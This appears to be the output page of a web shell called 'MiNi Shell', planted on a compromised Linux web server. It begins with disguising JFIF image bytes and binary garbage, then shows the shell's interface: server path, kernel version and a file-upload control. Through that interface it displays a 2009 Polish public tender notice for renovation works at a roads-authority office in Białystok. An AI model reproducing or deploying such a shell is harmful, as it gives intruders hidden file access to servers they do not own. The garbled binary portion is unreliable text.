JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/216062-N-2009.html

<p class="kh_header"><b>Białystok: Remont pomieszczeń (piwnic budynku, 4 pokoi biurowych oraz budynku garażowo - gospodarczego) Generalnej Dyrekcji Dróg Krajowych i Autostrad Oddział w Białymstoku, ul. Zwycięstwa 2</b><br>
<b>Numer ogłoszenia: 216062 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Dróg Krajowych i Autostrad Oddział w Białymstoku , ul. Zwycięstwa 2, 15-703 Białystok, woj. podlaskie, tel. 085 6645800, faks 085 6513783.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gddkia.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń (piwnic budynku, 4 pokoi biurowych oraz budynku garażowo - gospodarczego) Generalnej Dyrekcji Dróg Krajowych i Autostrad Oddział w Białymstoku, ul. Zwycięstwa 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont pomieszczeń piwnic budynku, 4 pokoi biurowych oraz budynku garażowo - gospodarczego Generalnej Dyrekcji Dróg Krajowych i Autostrad Oddział w Białymstoku, ul. Zwycięstwa 2
1.  Remont piwnic i 4 pomieszczeń biurowych:
     A. Branża budowlana
1) roboty rozbiórkowe i pomocnicze
    - rozebranie ścianki działowej wys.2,4m pomieszczenia 02-04 piwnica
    - rozbiórka drewnianych podłóg (pom. 02-04 piwnica) i ściany z płyty pilśniowej w pom.022,
    - rozbiórka boazerii i drewnianej, zabudowy półek wnękowych pom 08,
    - rozbiórka glazury na ścianach,
    - rozbiórka starych wykładzin lub linoleum w piwnicy,
    - wykucie ościeżnic drzwiowych 70/200, 80/200, 90/200 - 24szt,
    - skucie posadzek - lastryko, terakota lub betonowej,
    - rozbiórka wykładziny w pom. 108,109 na I piętrze
    - demontaż baterii i zlewów - 4szt,
    - roboty pomocnicze, np. przenoszenie akt na czas remontu, inne drobne rozbiórki (kratki
      wentylacyjne, wpust podłogowy, uchwyt stalowy, krata w 1 oknie itp.).
    - transport gruzu z terenu rozbiórki,
2) roboty okładzinowe
a) ułożenie gresu i glazury
    - warstwy wyrównawcze pod posadzkę gr. 20 mm,
    - warstwy wyrównujące z masy samopoziomującej gr.5 mm,
    - ułożenie posadzki z terakoty płytki 30x30 cm metodą kombinowaną
    - ułożenie cokolika o wysokości 10cm,
    - ułożenie okładziny schodów (2 zejścia do piwnicy),
    - ułożenie cokolika wys. 10cm na schodach z przygotowaniem podłoża,
    - ułożenie glazury na ścianie przy zlewach,
    - montaż progów drewnianych w przypadku różnic poziomów.
b) okładziny z płyt gipsowo-kartonowych
    - obudowy z płyt g-k wodoodpornych gr.12,5mm otworów okiennych, 
    - otworów po szafkach elektrycznych,
    - otworów po grzejnikach,
    - zabudowy innych drobnych otworów,
c) wykładzina dywanowa w pok.108 i 109 I piętro,
    - wykonanie posadzek dywanowych w pomieszczeniach biurowych 
    - montaż listew wykończeniowych,
    - zamontowanie listew w progach - 3szt.
d) sufit podwieszony w pok.108 i 109 I piętro oraz pok. 6 i 6A parter
    - demontaż istniejących paneli sufitów podwieszonych,
    - ostrożne podwieszanie i ułożenie istniejących przewodów instalacyjnych w uzgodnieniu z użytkownikiem  budynku,
    - montaż okładziny z płyt niepalnych EN 13501-1, format płyt 600*600 mm grubość 18mm. 
Uwaga: zakres robót dotyczy jedynie wymiany paneli sufitowych, bez wymiany stelażu.
3) tynk wewnętrzny
    - wykonanie tynków wewnętrznych, 
    - zabezpieczenie grzybobójcze ścian.
4) malowanie i szpachlowanie
    - przygotowanie podłoży pod roboty malarskie,
    - odgrzybianie wgłębne murów - ok. 60m2,
    - jednokrotne szpachlowanie ścian i sufitów,
    - dwukrotne malowanie ścian i sufitów,
    - osadzenie kratek wentylacyjnych 14x28cm bez żaluzji,
    - malowanie lamperii farbą olejną do wys.1,5m,
    - dwukrotne malowanie farbą olejną uprzednio malowanej stolarki drzwiowej
       (pom.108-109),
    - dwukrotne malowanie farbami olejnymi uprzednio malowanych powierzchni metalowych pełnych (drzwi metalowe w schronie, ościeżnice metalowe, 2 stalowe dwuteowniki),
    - jednokrotne malowanie farbą olejną rur c.o. żeliwnych,
    - niezbędne prace malarskie związane z remontem,
    - roboty porządkowe.
Kolorystyka do uzgodnienia z Zamawiającym po przedstawieniu wzornika kolorów od producenta.
5) montaż drzwi wewnętrznych 
    - dostawa i montaż ościeżnic fabrycznie wykończonych - okleinowanych do drzwi typowych,
    - dostawa i montaż skrzydeł drzwiowych wewnętrznych pełnych fabrycznie wykończonych okleinowanych z otworami wentylacyjnymi (jak do łazienki),
    - dostawa i montaż szyldów i klamek, wszystkie drzwi zamykane na klucz - 3 komplety kluczy,
    - montaż drewnianej obudowy we wnęce pom. 08 - 2 szt.
6) montaż parapetów wewnętrznych
    - demontaż parapetów lastryko w pom. biurowych i piwnicznych,
    - dostawa i montaż parapetów wewnętrznych z konglomeratu marmurowego gr. 2 - 4 cm  w pom. biurowych.
7) roboty sanitarne 
    - demontaż zlewozmywaków i baterii - 4 szt.,
    - demontaż nieczynnych rur sanitarnych i ich zabezpieczenie,
    - montaż nowych umywalek i baterii - 2 szt.,
    - montaż szafki na hydrant - 1szt.,
    - podłączenia umywalek i baterii do kanalizacji - 2szt.,
    - malowanie rur żeliwnych i innych elementów sanitarnych,
    - izolacja rurociągów, osłony na rurach wod. - kan. i c.o. 
B. Branża elektryczna
a)  roboty demontażowe
    - demontaż istniejącej instalacji elektrycznej,
    - demontaż/montaż istniejących rozdzielnic elektrycznych,
    - demontaż/montaż istniejących opraw oświetleniowych,
    - demontaż/montaż osprzętu instalacyjnego,
    - demontaż/montaż instalacji uziemiającej.
 b) instalacja elektryczna wnętrzowa 
    - wykonanie bruzd do montażu podtynkowego przewodów i osprzętu,
    - montaż instalacji elektrycznej w listwach instalacyjnych,
    - montaż bednarki uziemiającej na wspornikach,
    - montaż drzwiczek wtynkowych w TW,
    - montaż osprzętu elektrycznego,
    - montaż opraw oświetleniowych,
    - pomiary i badania instalacji oraz ochrony przeciwporażeniowej,
1.	Remont budynku garażowo-gospodarczego:
A. Branża budowlana
1) roboty rozbiórkowe i pomocnicze
    - rozbiórka kratki ściekowej,
    - wymiana klamek z szyldami w drzwiach do pomieszczeń magazynowych - 4szt.,
    - transport gruzu z terenu rozbiórki,
2)  roboty okładzinowe - gres
    - warstwy wyrównawcze pod posadzkę gr. 20-50 mm,
    - ułożenie posadzki z gresu mrozoodpornego, płytki 30x30 cm metodą kombinowaną,
    - ułożenie cokolika o wysokości 10cm,
    - konserwacja stalowego kątownika w progu garażu -dwukrotne malowanie farbą
      antykorozyjną do metalu.
3)  malowanie i szpachlowanie
    - przygotowanie podłoży pod roboty malarskie - 245,81m2,
    - naprawa pęknięć ścian - siatka, tynk uzupełniający - 10m2,
    - jednokrotne szpachlowanie ścian i sufitów,
    - dwukrotne malowanie ścian i sufitów,
    - osadzenie kratek wentylacyjnych 14x28 bez żaluzji - 2szt.
    - malowanie lamperii farbą olejną do wys.1,5m w garażach,
    - niezbędne prace malarskie związane z remontem,
    - naprawa elewacji przy garażach po osadzeniu bram wjazdowych - 4,20m2,
    - roboty porządkowe.
B. Branża elektryczna
1) roboty demontażowe
    - demontaż istniejącej instalacji elektrycznej - 50 mb,
    - demontaż istniejących opraw oświetleniowych - 7 szt.,
    - demontaż osprzętu instalacyjnego - 15 szt.
2) instalacja elektryczna wnętrzowa
    - montaż instalacji elektrycznej w listwach instalacyjnych - 50 mb,
    - montaż osprzętu elektrycznego - 25 szt.,
    - montaż opraw oświetleniowych - 8 szt.,
    - pomiary i badania instalacji oraz ochrony przeciwporażeniowej - 1 kpl..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą brać udział Wykonawcy niepodlegający wykluczeniu na podstawie art. 24 ustawy Pzp oraz spełniający niżej określone warunki udziału w postępowaniu. I.Doświadczenie. Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył) jako wykonawca lub podwykonawca co najmniej 2 zadania porównywalne z przedmiotem niniejszego postępowania, polegające na remoncie budynku użyteczności publicznej, każde o wartości min. 100 000 PLN. W przypadku Wykonawców wspólnie
ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 i ust. 2 ustawy Pzp, natomiast warunki określone w pkt I muszą spełniać łącznie.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie art. 24 ustawy Pzp.
Podstawą oceny spełniania warunków będą w szczególności wymagane dokumenty i oświadczenia, o których mowa w ogłoszeniu, na zasadzie spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Dla potwierdzenia spełnienia warunków, określonych w art. 24 ust. 1 pkt 1)-9) ustawy Pzp, Wykonawcy powinni przedłożyć niżej wymienione dokumenty: 1) Oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodne z
treścią Formularza 3.1. IDW. 2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 3) Informację o doświadczeniu Wykonawcy (Doświadczenie
zawodowe), zgodną z treścią Formularza 3.2. IDW. Informacja musi potwierdzać spełnienie wymaganego warunku w zakresie doświadczenia. Do informacji powinny być dołączone dokumenty potwierdzające, że wymienione w informacji zamówienia zostały wykonane należycie. II. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej , zamiast dokumentów, o których mowa w pkt I. 2) - składa dokument lub dokumenty, wystawione w kraju, w
którym ma on siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. III. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt II, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym
organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. IV. Dokumenty, o których mowa w pkt II i III, powinny być wystawione nie wcześniej niż odpowiadające im dokumenty określone w pkt I.2). V. Dokumenty i oświadczenia wymagane dla
potwierdzenia spełnienia przez Wykonawców warunków winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Potwierdzenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienną pieczątką
osoby poświadczającej kopię dokumentu za zgodność z oryginałem). Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę. VI. W celu potwierdzenia spełnienia warunków wymaganych od Wykonawców wspólnie ubiegających się o udzielenie zamówienia: a) oświadczenie wymienione w pkt I.1) powinno być złożone w imieniu
wszystkich Wykonawców; b) dokumenty wymienione w pkt I.2) albo odpowiadające im określone w pkt II i III, powinny być złożone przez każdego Wykonawcę; c) dokumenty wymienione w pkt I.3) mogą dotyczyć dowolnego spośród wykonawców składających wspólną ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bialystok.gddkia.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Białystok, ul. Zwycięstwa 2, pokój 214 - wersja papierowa - cena 50,00 PLN brutto..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2009 godzina 09:50, miejsce: GDDKiA Oddział w Białymstoku, ul. Zwycięstwa 2, sekretariat - pokój 104..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com